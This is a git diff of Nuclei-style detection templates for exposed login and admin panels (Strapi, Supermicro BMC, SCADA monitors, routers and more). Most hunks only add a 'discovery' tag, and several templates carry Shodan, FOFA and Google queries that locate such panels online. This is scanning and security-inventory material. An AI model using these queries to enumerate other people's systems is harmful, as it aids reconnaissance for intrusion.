tags: panel,storybook,workshop + tags: panel,storybook,workshop,discovery http: - method: GET diff --git a/http/exposed-panels/strapi-documentation.yaml b/http/exposed-panels/strapi-documentation.yaml index 8e4a55d382d..be69522f130 100644 --- a/http/exposed-panels/strapi-documentation.yaml +++ b/http/exposed-panels/strapi-documentation.yaml @@ -13,7 +13,7 @@ info: max-request: 2 vendor: strapi product: strapi - tags: strapi,panel + tags: strapi,panel,discovery http: - method: GET diff --git a/http/exposed-panels/strapi-panel.yaml b/http/exposed-panels/strapi-panel.yaml index 242803f8035..85d1a889446 100644 --- a/http/exposed-panels/strapi-panel.yaml +++ b/http/exposed-panels/strapi-panel.yaml @@ -18,7 +18,7 @@ info: vendor: strapi product: strapi shodan-query: http.title:"strapi" - tags: panel,strapi,login + tags: panel,strapi,login,discovery http: - method: GET diff --git a/http/exposed-panels/stridercd-panel.yaml b/http/exposed-panels/stridercd-panel.yaml index 34518674cee..7df9326b6c4 100644 --- a/http/exposed-panels/stridercd-panel.yaml +++ b/http/exposed-panels/stridercd-panel.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:115295460 - tags: panel,cicd,oss,stridercd,strider + tags: panel,cicd,oss,stridercd,strider,discovery http: - method: GET diff --git a/http/exposed-panels/structurizr-panel.yaml b/http/exposed-panels/structurizr-panel.yaml index f0ce5562c95..e1a3e60ec0e 100644 --- a/http/exposed-panels/structurizr-panel.yaml +++ b/http/exposed-panels/structurizr-panel.yaml @@ -16,7 +16,7 @@ info: product: on-premises_installation shodan-query: http.favicon.hash:1199592666 fofa-query: icon_hash=1199592666 - tags: panel,structurizr,detect + tags: panel,structurizr,detect,discovery http: - method: GET diff --git a/http/exposed-panels/submitty-login.yaml b/http/exposed-panels/submitty-login.yaml index 7a3d1265c45..7d227ae32a1 100644 --- a/http/exposed-panels/submitty-login.yaml +++ b/http/exposed-panels/submitty-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,submitty,oss + tags: panel,submitty,oss,discovery http: - method: GET diff --git a/http/exposed-panels/subrion-login.yaml b/http/exposed-panels/subrion-login.yaml index c98017dff2f..ecb10886377 100644 --- a/http/exposed-panels/subrion-login.yaml +++ b/http/exposed-panels/subrion-login.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: intelliants product: subrion - tags: panel,subrion,intelliants + tags: panel,subrion,intelliants,discovery http: - method: GET diff --git a/http/exposed-panels/sugarcrm-panel.yaml b/http/exposed-panels/sugarcrm-panel.yaml index 5638abce443..e22d493445d 100644 --- a/http/exposed-panels/sugarcrm-panel.yaml +++ b/http/exposed-panels/sugarcrm-panel.yaml @@ -22,7 +22,7 @@ info: fofa-query: - title=sugarcrm - body="sugarcrm inc. all rights reserved" - tags: sugarcrm,panel + tags: sugarcrm,panel,discovery http: - method: GET diff --git a/http/exposed-panels/sunbird-dcim-panel.yaml b/http/exposed-panels/sunbird-dcim-panel.yaml index d19a7b286c9..126839b0830 100644 --- a/http/exposed-panels/sunbird-dcim-panel.yaml +++ b/http/exposed-panels/sunbird-dcim-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:781922099 - tags: sunbird,panel,login + tags: sunbird,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/sungrow-logger1000-detect.yaml b/http/exposed-panels/sungrow-logger1000-detect.yaml index 1a9ebca2664..856a0084ba6 100644 --- a/http/exposed-panels/sungrow-logger1000-detect.yaml +++ b/http/exposed-panels/sungrow-logger1000-detect.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: title:logger html:"htmlWebpackPlugin.options.title" - tags: panel,logger1000,sungrow + tags: panel,logger1000,sungrow,discovery http: - method: GET diff --git a/http/exposed-panels/superadmin-ui-panel.yaml b/http/exposed-panels/superadmin-ui-panel.yaml index 77af26ac716..a13273566dc 100644 --- a/http/exposed-panels/superadmin-ui-panel.yaml +++ b/http/exposed-panels/superadmin-ui-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Superadmin UI - 4myhealth" - tags: panel,superadmin + tags: panel,superadmin,discovery http: - method: GET diff --git a/http/exposed-panels/supermicro-bmc-panel.yaml b/http/exposed-panels/supermicro-bmc-panel.yaml index 2bdc6fa77a7..a655aa85dd1 100644 --- a/http/exposed-panels/supermicro-bmc-panel.yaml +++ b/http/exposed-panels/supermicro-bmc-panel.yaml @@ -19,7 +19,7 @@ info: google-query: intitle:"Supermicro BMC Login" product: x11ssv-m4f vendor: supermicro - tags: panel,supermicro,bmc + tags: panel,supermicro,bmc,discovery http: - method: GET diff --git a/http/exposed-panels/superset-login.yaml b/http/exposed-panels/superset-login.yaml index 4728a88f96f..f2593be7ec2 100644 --- a/http/exposed-panels/superset-login.yaml +++ b/http/exposed-panels/superset-login.yaml @@ -20,7 +20,7 @@ info: fofa-query: - body="apache superset" - icon_hash=1582430156 - tags: panel,superset,apache + tags: panel,superset,apache,discovery http: - method: GET diff --git a/http/exposed-panels/supertokens-panel.yaml b/http/exposed-panels/supertokens-panel.yaml index 9d37d35923a..ee623b94134 100644 --- a/http/exposed-panels/supertokens-panel.yaml +++ b/http/exposed-panels/supertokens-panel.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 shodan-query: html:"<title>SuperTokens " - tags: panel,login,supertokens + tags: panel,login,supertokens,discovery http: - method: GET diff --git a/http/exposed-panels/supervpn-panel.yaml b/http/exposed-panels/supervpn-panel.yaml index 91edc2a931b..18c8b7f1408 100644 --- a/http/exposed-panels/supervpn-panel.yaml +++ b/http/exposed-panels/supervpn-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel + tags: panel,discovery http: - method: GET diff --git a/http/exposed-panels/suprema-biostar-panel.yaml b/http/exposed-panels/suprema-biostar-panel.yaml index e482fcab66e..16328cfd728 100644 --- a/http/exposed-panels/suprema-biostar-panel.yaml +++ b/http/exposed-panels/suprema-biostar-panel.yaml @@ -12,7 +12,7 @@ info: vendor: supremainc product: biostar_2 shodan-query: title:"Biostar" - tags: panel,login,biostar,detect + tags: panel,login,biostar,detect,discovery http: - method: GET diff --git a/http/exposed-panels/suse-manager-panel.yaml b/http/exposed-panels/suse-manager-panel.yaml index 60e3be7177c..366d8fe555e 100644 --- a/http/exposed-panels/suse-manager-panel.yaml +++ b/http/exposed-panels/suse-manager-panel.yaml @@ -18,7 +18,7 @@ info: - title="SUSE Multi-Linux Manager - Sign In" - title="Uyuni - Sign In" - icon_hash="1158194469" - tags: panel,detect,suse,login + tags: panel,detect,suse,login,discovery http: - method: GET diff --git a/http/exposed-panels/syfadis-xperience-panel.yaml b/http/exposed-panels/syfadis-xperience-panel.yaml index 6581922a0ef..7da7c397d5e 100644 --- a/http/exposed-panels/syfadis-xperience-panel.yaml +++ b/http/exposed-panels/syfadis-xperience-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="Syfadis Xperience" - tags: panel,syfadis,login,detect + tags: panel,syfadis,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/symantec/symantec-dlp-login.yaml b/http/exposed-panels/symantec/symantec-dlp-login.yaml index e852c222526..b413afbcc9a 100644 --- a/http/exposed-panels/symantec/symantec-dlp-login.yaml +++ b/http/exposed-panels/symantec/symantec-dlp-login.yaml @@ -18,7 +18,7 @@ info: - http.title:"symantec data loss prevention" fofa-query: title="symantec data loss prevention" google-query: intitle:"symantec data loss prevention" - tags: symantec,panel,login + tags: symantec,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/symantec/symantec-epm-login.yaml b/http/exposed-panels/symantec/symantec-epm-login.yaml index 8778a34ace7..7de0b5d61a8 100644 --- a/http/exposed-panels/symantec/symantec-epm-login.yaml +++ b/http/exposed-panels/symantec/symantec-epm-login.yaml @@ -18,7 +18,7 @@ info: - http.title:"symantec endpoint protection manager" fofa-query: title="symantec endpoint protection manager" google-query: intitle:"symantec endpoint protection manager" - tags: symantec,panel,login + tags: symantec,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/symantec/symantec-ewep-login.yaml b/http/exposed-panels/symantec/symantec-ewep-login.yaml index 50f2f6139f0..8eb2e9c959a 100644 --- a/http/exposed-panels/symantec/symantec-ewep-login.yaml +++ b/http/exposed-panels/symantec/symantec-ewep-login.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Symantec Encryption Server" - tags: panel,symantec,login + tags: panel,symantec,login,discovery http: - method: GET diff --git a/http/exposed-panels/symantec/symantec-iam-console.yaml b/http/exposed-panels/symantec/symantec-iam-console.yaml index ce6b86cb4d7..a562af0775f 100644 --- a/http/exposed-panels/symantec/symantec-iam-console.yaml +++ b/http/exposed-panels/symantec/symantec-iam-console.yaml @@ -14,7 +14,7 @@ info: max-request: 1 vendor: broadcom product: symantec_identity_manager - tags: symantec,panel,login,broadcom + tags: symantec,panel,login,broadcom,discovery http: - method: GET diff --git a/http/exposed-panels/symantec/symantec-pgp-global-directory.yaml b/http/exposed-panels/symantec/symantec-pgp-global-directory.yaml index 8446f133fdc..b10c91d5951 100644 --- a/http/exposed-panels/symantec/symantec-pgp-global-directory.yaml +++ b/http/exposed-panels/symantec/symantec-pgp-global-directory.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"PGP Global Directory" - tags: symantec,panel + tags: symantec,panel,discovery http: - method: GET diff --git a/http/exposed-panels/symantec/symantec-phishing-panel.yaml b/http/exposed-panels/symantec/symantec-phishing-panel.yaml index c6bf3daadb2..5459db9dc80 100644 --- a/http/exposed-panels/symantec/symantec-phishing-panel.yaml +++ b/http/exposed-panels/symantec/symantec-phishing-panel.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: symantec,panel,login + tags: symantec,panel,login,discovery self-contained: true variables: diff --git a/http/exposed-panels/synapse-mobility-panel.yaml b/http/exposed-panels/synapse-mobility-panel.yaml index d07f769ed9b..1fe266149f7 100644 --- a/http/exposed-panels/synapse-mobility-panel.yaml +++ b/http/exposed-panels/synapse-mobility-panel.yaml @@ -14,7 +14,7 @@ info: max-request: 1 shodan-query: http.title:"Synapse Mobility Login" google-query: intitle:"Synapse Mobility Login" - tags: panel,synapse + tags: panel,synapse,discovery http: - method: GET diff --git a/http/exposed-panels/syncserver-panel.yaml b/http/exposed-panels/syncserver-panel.yaml index cbcff767558..50648a5d80d 100644 --- a/http/exposed-panels/syncserver-panel.yaml +++ b/http/exposed-panels/syncserver-panel.yaml @@ -15,7 +15,7 @@ info: - html:"Symmetricom SyncServer" - http.html:"symmetricom syncserver" fofa-query: body="symmetricom syncserver" - tags: panel,login,syncserver,symmetricom,detect,microchip + tags: panel,login,syncserver,symmetricom,detect,microchip,discovery http: - method: GET diff --git a/http/exposed-panels/syncthru-web-service.yaml b/http/exposed-panels/syncthru-web-service.yaml index c542babc887..66e3c5a9d6a 100644 --- a/http/exposed-panels/syncthru-web-service.yaml +++ b/http/exposed-panels/syncthru-web-service.yaml @@ -21,7 +21,7 @@ info: - http.title:"syncthru web service" fofa-query: title="syncthru web service" google-query: intitle:"syncthru web service" - tags: edb,panel,syncthru,printer,samsung + tags: edb,panel,syncthru,printer,samsung,discovery http: - method: GET diff --git a/http/exposed-panels/synnefo-admin-panel.yaml b/http/exposed-panels/synnefo-admin-panel.yaml index 3e5ff546af6..fa1fbaabce1 100644 --- a/http/exposed-panels/synnefo-admin-panel.yaml +++ b/http/exposed-panels/synnefo-admin-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,synnefo + tags: panel,synnefo,discovery http: - method: GET diff --git a/http/exposed-panels/synology-rackstation-login.yaml b/http/exposed-panels/synology-rackstation-login.yaml index 9248e9492bc..038e7b30503 100644 --- a/http/exposed-panels/synology-rackstation-login.yaml +++ b/http/exposed-panels/synology-rackstation-login.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: login,tech,synology,rackstation,panel + tags: login,tech,synology,rackstation,panel,discovery http: - method: GET diff --git a/http/exposed-panels/synopsys-coverity-panel.yaml b/http/exposed-panels/synopsys-coverity-panel.yaml index 6db5e991185..969b5ebd890 100644 --- a/http/exposed-panels/synopsys-coverity-panel.yaml +++ b/http/exposed-panels/synopsys-coverity-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Coverity" - tags: panel,coverity,synopsys + tags: panel,coverity,synopsys,discovery http: - method: GET diff --git a/http/exposed-panels/sysaid-panel.yaml b/http/exposed-panels/sysaid-panel.yaml index 00d523c4b8d..de214492061 100644 --- a/http/exposed-panels/sysaid-panel.yaml +++ b/http/exposed-panels/sysaid-panel.yaml @@ -16,7 +16,7 @@ info: product: sysaid shodan-query: http.favicon.hash:1540720428 fofa-query: icon_hash=1540720428 - tags: panel,sysaid,helpdesk,detect + tags: panel,sysaid,helpdesk,detect,discovery http: - method: GET diff --git a/http/exposed-panels/tabby-panel.yaml b/http/exposed-panels/tabby-panel.yaml index 8bb396bc5fc..7095f4e7e3b 100644 --- a/http/exposed-panels/tabby-panel.yaml +++ b/http/exposed-panels/tabby-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: title="Tabby" - tags: panel,login,tabby,detect + tags: panel,login,tabby,detect,discovery http: - method: GET diff --git a/http/exposed-panels/tableau-panel.yaml b/http/exposed-panels/tableau-panel.yaml index 6bdf5dc9e6d..e0831144114 100644 --- a/http/exposed-panels/tableau-panel.yaml +++ b/http/exposed-panels/tableau-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 fofa-query: app="Tableau-Python-Server" - tags: tableau,panel,python + tags: tableau,panel,python,discovery http: - method: GET diff --git a/http/exposed-panels/tableau-service-manager.yaml b/http/exposed-panels/tableau-service-manager.yaml index d4596db1c72..5da9bb9b8a4 100644 --- a/http/exposed-panels/tableau-service-manager.yaml +++ b/http/exposed-panels/tableau-service-manager.yaml @@ -21,7 +21,7 @@ info: - http.title:"login - tableau services manager" fofa-query: title="login - tableau services manager" google-query: intitle:"login - tableau services manager" - tags: panel,tableau,tableausoftware + tags: panel,tableau,tableausoftware,discovery http: - method: GET diff --git a/http/exposed-panels/tactical-rmm-panel.yaml b/http/exposed-panels/tactical-rmm-panel.yaml index 2c186f406dc..65292e03e86 100644 --- a/http/exposed-panels/tactical-rmm-panel.yaml +++ b/http/exposed-panels/tactical-rmm-panel.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Tactical RMM - Login" - tags: panel,tacticalrmm,login,detect + tags: panel,tacticalrmm,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/tailon-panel.yaml b/http/exposed-panels/tailon-panel.yaml index e0f32edbcb5..4c514cb25a9 100644 --- a/http/exposed-panels/tailon-panel.yaml +++ b/http/exposed-panels/tailon-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"tailon" - tags: panel,tailon,detect + tags: panel,tailon,detect,discovery http: - method: GET diff --git a/http/exposed-panels/tautulli-panel.yaml b/http/exposed-panels/tautulli-panel.yaml index 7932444e2ec..d6bf9069ed0 100644 --- a/http/exposed-panels/tautulli-panel.yaml +++ b/http/exposed-panels/tautulli-panel.yaml @@ -26,7 +26,7 @@ info: google-query: - intitle:"tautulli" - intitle:"tautulli - home" - tags: panel,tautulli,detect + tags: panel,tautulli,detect,discovery http: - method: GET diff --git a/http/exposed-panels/teamcity-login-panel.yaml b/http/exposed-panels/teamcity-login-panel.yaml index 5d4ed994b09..a6e0e80b9ce 100644 --- a/http/exposed-panels/teamcity-login-panel.yaml +++ b/http/exposed-panels/teamcity-login-panel.yaml @@ -20,7 +20,7 @@ info: - http.component:"teamcity" fofa-query: title=teamcity google-query: intitle:teamcity - tags: panel,teamcity,jetbrains,detect + tags: panel,teamcity,jetbrains,detect,discovery http: - method: GET diff --git a/http/exposed-panels/teamforge-panel.yaml b/http/exposed-panels/teamforge-panel.yaml index 702d5f8aab4..41e87ecdb57 100644 --- a/http/exposed-panels/teamforge-panel.yaml +++ b/http/exposed-panels/teamforge-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: title:"TeamForge :" fofa-query: title="TeamForge :" - tags: panel,teamforge,login + tags: panel,teamforge,login,discovery http: - method: GET diff --git a/http/exposed-panels/teampass-panel.yaml b/http/exposed-panels/teampass-panel.yaml index 72e439bed39..907b54d87a7 100644 --- a/http/exposed-panels/teampass-panel.yaml +++ b/http/exposed-panels/teampass-panel.yaml @@ -16,7 +16,7 @@ info: product: teampass shodan-query: http.html:"teampass" fofa-query: body="teampass" - tags: panel,teampass + tags: panel,teampass,discovery http: - method: GET diff --git a/http/exposed-panels/tectuus-scada-monitor.yaml b/http/exposed-panels/tectuus-scada-monitor.yaml index 98d114cd9ae..123e91ca315 100644 --- a/http/exposed-panels/tectuus-scada-monitor.yaml +++ b/http/exposed-panels/tectuus-scada-monitor.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,tectuus,scada + tags: panel,tectuus,scada,discovery http: - method: GET diff --git a/http/exposed-panels/tekton-dashboard.yaml b/http/exposed-panels/tekton-dashboard.yaml index 504c01bc368..62f580d0540 100644 --- a/http/exposed-panels/tekton-dashboard.yaml +++ b/http/exposed-panels/tekton-dashboard.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Tekton" - tags: panel,tekton,exposure + tags: panel,tekton,exposure,discovery http: - method: GET diff --git a/http/exposed-panels/telecontrol-server-basic-panel.yaml b/http/exposed-panels/telecontrol-server-basic-panel.yaml index 646574eeaee..87a3dc2a144 100644 --- a/http/exposed-panels/telecontrol-server-basic-panel.yaml +++ b/http/exposed-panels/telecontrol-server-basic-panel.yaml @@ -14,7 +14,7 @@ info: vendor: siemens product: telecontrol_server_basic fofa-query: title=="Logon - Telecontrol Server Basic" - tags: panel,login,siemens,detect + tags: panel,login,siemens,detect,discovery http: - method: GET diff --git a/http/exposed-panels/teleport-login-panel.yaml b/http/exposed-panels/teleport-login-panel.yaml index 452862f8076..862c78c447e 100644 --- a/http/exposed-panels/teleport-login-panel.yaml +++ b/http/exposed-panels/teleport-login-panel.yaml @@ -21,7 +21,7 @@ info: - icon_hash="1854879765" - icon_hash="-1275955539" - "Set-Cookie: __Host-grv_csrf" - tags: panel,teleport,login,oss + tags: panel,teleport,login,oss,discovery http: - method: GET diff --git a/http/exposed-panels/telerik-server-login.yaml b/http/exposed-panels/telerik-server-login.yaml index 306498dfb19..7e4424321ab 100644 --- a/http/exposed-panels/telerik-server-login.yaml +++ b/http/exposed-panels/telerik-server-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.html:"Telerik Report Server" product: telerik_report_server vendor: progress - tags: telerik,panel + tags: telerik,panel,discovery http: - method: GET diff --git a/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml b/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml index 97d58412a4b..9f9e5f1bf69 100644 --- a/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml +++ b/http/exposed-panels/telesquare/tlr-2005ksh-login.yaml @@ -18,7 +18,7 @@ info: - http.html:"TLR-2005KSH" - http.html:"tlr-2005ksh" fofa-query: body="tlr-2005ksh" - tags: panel,router,telesquare + tags: panel,router,telesquare,discovery http: - method: GET diff --git a/http/exposed-panels/teltonika-login.yaml b/http/exposed-panels/teltonika-login.yaml index f59e3324658..6df29f623d6 100644 --- a/http/exposed-panels/teltonika-login.yaml +++ b/http/exposed-panels/teltonika-login.yaml @@ -17,7 +17,7 @@ info: google-query: intitle:"Teltonika -Web UI" | intitle:"Teltonika-RUT -Web UI" inurl:"/cgi-bin/luci" product: rut900 vendor: teltonika - tags: panel,teltonika,edb + tags: panel,teltonika,edb,discovery http: - method: GET diff --git a/http/exposed-panels/tembosocial-panel.yaml b/http/exposed-panels/tembosocial-panel.yaml index 5a4e785490a..e8a133833ee 100644 --- a/http/exposed-panels/tembosocial-panel.yaml +++ b/http/exposed-panels/tembosocial-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"TemboSocial Administration" - tags: panel,tembosocial + tags: panel,tembosocial,discovery http: - method: GET diff --git a/http/exposed-panels/temenos-t24-login.yaml b/http/exposed-panels/temenos-t24-login.yaml index 322d0ff6f4e..ab23d5a58d3 100644 --- a/http/exposed-panels/temenos-t24-login.yaml +++ b/http/exposed-panels/temenos-t24-login.yaml @@ -17,7 +17,7 @@ info: verified: true product: t24 vendor: temenos - tags: panel,exposure,temenos + tags: panel,exposure,temenos,discovery http: - method: GET diff --git a/http/exposed-panels/tenda-11n-wireless-router-login.yaml b/http/exposed-panels/tenda-11n-wireless-router-login.yaml index c42638c21d3..daba93fb0aa 100644 --- a/http/exposed-panels/tenda-11n-wireless-router-login.yaml +++ b/http/exposed-panels/tenda-11n-wireless-router-login.yaml @@ -18,7 +18,7 @@ info: google-query: intitle:"Tenda 11N Wireless Router Login Screen" product: 11n vendor: tenda - tags: panel,tenda + tags: panel,tenda,discovery http: - method: GET diff --git a/http/exposed-panels/tenda-web-master.yaml b/http/exposed-panels/tenda-web-master.yaml index e3172971473..cd77566f7a1 100644 --- a/http/exposed-panels/tenda-web-master.yaml +++ b/http/exposed-panels/tenda-web-master.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Tenda Web Master" - tags: panel,tenda,router + tags: panel,tenda,router,discovery http: - method: GET diff --git a/http/exposed-panels/tenemos-t24-panel.yaml b/http/exposed-panels/tenemos-t24-panel.yaml index a49d013cf49..b9e3812839b 100644 --- a/http/exposed-panels/tenemos-t24-panel.yaml +++ b/http/exposed-panels/tenemos-t24-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"T24 Sign in" - tags: panel,tenemos,login + tags: panel,tenemos,login,discovery http: - method: GET diff --git a/http/exposed-panels/teradek-panel.yaml b/http/exposed-panels/teradek-panel.yaml index ddd3741cfd0..771df1bc4a0 100644 --- a/http/exposed-panels/teradek-panel.yaml +++ b/http/exposed-panels/teradek-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Teradek Cube Administrative Console" - tags: panel,login,teradek + tags: panel,login,teradek,discovery http: - method: GET diff --git a/http/exposed-panels/teradici-pcoip-panel.yaml b/http/exposed-panels/teradici-pcoip-panel.yaml index c4984fe4e22..9ca7154549d 100644 --- a/http/exposed-panels/teradici-pcoip-panel.yaml +++ b/http/exposed-panels/teradici-pcoip-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: teradici product: pcoip_client - tags: panel,teradici,pcoip + tags: panel,teradici,pcoip,discovery http: - method: GET diff --git a/http/exposed-panels/terraform-enterprise-panel.yaml b/http/exposed-panels/terraform-enterprise-panel.yaml index 009773ead08..f52497b64fc 100644 --- a/http/exposed-panels/terraform-enterprise-panel.yaml +++ b/http/exposed-panels/terraform-enterprise-panel.yaml @@ -22,7 +22,7 @@ info: - intitle:"Terraform Enterprise" - intitle:"terraform enterprise" fofa-query: title="terraform enterprise" - tags: panel,terraform,hashicorp + tags: panel,terraform,hashicorp,discovery http: - method: GET diff --git a/http/exposed-panels/terramaster-login.yaml b/http/exposed-panels/terramaster-login.yaml index 5103ee756f4..30cf5533ece 100644 --- a/http/exposed-panels/terramaster-login.yaml +++ b/http/exposed-panels/terramaster-login.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,terramaster,login + tags: panel,terramaster,login,discovery http: - method: GET diff --git a/http/exposed-panels/thinfinity-virtualui-panel.yaml b/http/exposed-panels/thinfinity-virtualui-panel.yaml index 2f9f177d942..0e3348decee 100644 --- a/http/exposed-panels/thinfinity-virtualui-panel.yaml +++ b/http/exposed-panels/thinfinity-virtualui-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"thinfinity virtualui" fofa-query: title="thinfinity virtualui" google-query: intitle:"thinfinity virtualui" - tags: panel,thinfinity,virtualui,cybelesoft + tags: panel,thinfinity,virtualui,cybelesoft,discovery http: - method: GET diff --git a/http/exposed-panels/thingsboard-panel.yaml b/http/exposed-panels/thingsboard-panel.yaml index 227c56d0ec6..c4b0e24290a 100644 --- a/http/exposed-panels/thingsboard-panel.yaml +++ b/http/exposed-panels/thingsboard-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"ThingsBoard" - tags: panel,thingsboard,detect + tags: panel,thingsboard,detect,discovery http: - method: GET diff --git a/http/exposed-panels/threatq-login.yaml b/http/exposed-panels/threatq-login.yaml index 11705a83967..293dba32a81 100644 --- a/http/exposed-panels/threatq-login.yaml +++ b/http/exposed-panels/threatq-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,threatq + tags: panel,threatq,discovery http: - method: GET diff --git a/http/exposed-panels/thruk-panel.yaml b/http/exposed-panels/thruk-panel.yaml index ba701e3d671..38b892cbb53 100644 --- a/http/exposed-panels/thruk-panel.yaml +++ b/http/exposed-panels/thruk-panel.yaml @@ -20,7 +20,7 @@ info: - title=="thruk monitoring webinterface" - body="thruk" shodan-query: http.html:"thruk" || http.title:"thruk monitoring webinterface" - tags: thruk,panel,login + tags: thruk,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/tibco-mft-panel.yaml b/http/exposed-panels/tibco-mft-panel.yaml index be3e366aa66..7f6c1dd898c 100644 --- a/http/exposed-panels/tibco-mft-panel.yaml +++ b/http/exposed-panels/tibco-mft-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"TIBCO Managed" - tags: tibco,mft,login,web,panel + tags: tibco,mft,login,web,panel,discovery http: - method: GET diff --git a/http/exposed-panels/tibco-spotfire-panel.yaml b/http/exposed-panels/tibco-spotfire-panel.yaml index c1ddd94cc2c..3e4dc08a208 100644 --- a/http/exposed-panels/tibco-spotfire-panel.yaml +++ b/http/exposed-panels/tibco-spotfire-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: "TIBCO Spotfire Server" product: spotfire_server vendor: tibco - tags: panel,tibco,login,detect + tags: panel,tibco,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/tigase-xmpp-server.yaml b/http/exposed-panels/tigase-xmpp-server.yaml index a461f0ad7cf..868155d3234 100644 --- a/http/exposed-panels/tigase-xmpp-server.yaml +++ b/http/exposed-panels/tigase-xmpp-server.yaml @@ -14,7 +14,7 @@ info: vendor: tigase product: tigase shodan-query: title:"Tigase XMPP Server" - tags: tigase,xmpp,server,panel,exposure + tags: tigase,xmpp,server,panel,exposure,discovery http: - method: GET diff --git a/http/exposed-panels/tikiwiki-cms.yaml b/http/exposed-panels/tikiwiki-cms.yaml index 2c26eb965ad..03db07645f3 100644 --- a/http/exposed-panels/tikiwiki-cms.yaml +++ b/http/exposed-panels/tikiwiki-cms.yaml @@ -15,7 +15,7 @@ info: product: tikiwiki_cms\/groupware shodan-query: http.html:"tiki wiki" fofa-query: body="tiki wiki" - tags: panel,tikiwiki,tiki + tags: panel,tikiwiki,tiki,discovery http: - method: GET diff --git a/http/exposed-panels/tiny-file-manager.yaml b/http/exposed-panels/tiny-file-manager.yaml index 1fb228c5b4a..802cfeba429 100644 --- a/http/exposed-panels/tiny-file-manager.yaml +++ b/http/exposed-panels/tiny-file-manager.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: title:"Tiny File Manager" zoomeye-query: app="Tiny File Manager" - tags: panel,filemanager,login,detect + tags: panel,filemanager,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/tiny-rss-panel.yaml b/http/exposed-panels/tiny-rss-panel.yaml index 092c913d4c0..c07bafef67a 100644 --- a/http/exposed-panels/tiny-rss-panel.yaml +++ b/http/exposed-panels/tiny-rss-panel.yaml @@ -16,7 +16,7 @@ info: vendor: tt-rss product: tiny_tiny_rss shodan-query: http.favicon.hash:-418614327 - tags: panel,tiny-rss,login,detect + tags: panel,tiny-rss,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/tixeo-panel.yaml b/http/exposed-panels/tixeo-panel.yaml index 7fb5b8db61a..094c54da99a 100644 --- a/http/exposed-panels/tixeo-panel.yaml +++ b/http/exposed-panels/tixeo-panel.yaml @@ -1,5 +1,5 @@ -id: tixeo-panel - +id: tixeo-panel + info: name: Tixeo Login Panel - Detect author: righettod @@ -12,27 +12,27 @@ info: verified: true max-request: 3 shodan-query: "http.title:\"tixeo\"" - tags: panel,tixeo,login,detect -http: - - method: GET - path: - - "{{BaseURL}}/meet/services/json/v1/settings" - - "{{BaseURL}}/meet/login.html" - - "{{BaseURL}}/meet/" - - stop-at-first-match: true - - matchers: - - type: dsl - dsl: - - 'contains(header, "Tixeo")' - - 'contains_any(to_lower(body), "tixeo-button", "tixeoclient")' - condition: or - - extractors: - - type: regex - part: body - group: 1 - regex: + tags: panel,tixeo,login,detect,discovery +http: + - method: GET + path: + - "{{BaseURL}}/meet/services/json/v1/settings" + - "{{BaseURL}}/meet/login.html" + - "{{BaseURL}}/meet/" + + stop-at-first-match: true + + matchers: + - type: dsl + dsl: + - 'contains(header, "Tixeo")' + - 'contains_any(to_lower(body), "tixeo-button", "tixeoclient")' + condition: or + + extractors: + - type: regex + part: body + group: 1 + regex: - '"applicationVersion"\s*:\s*"([0-9.]+)"' # digest: 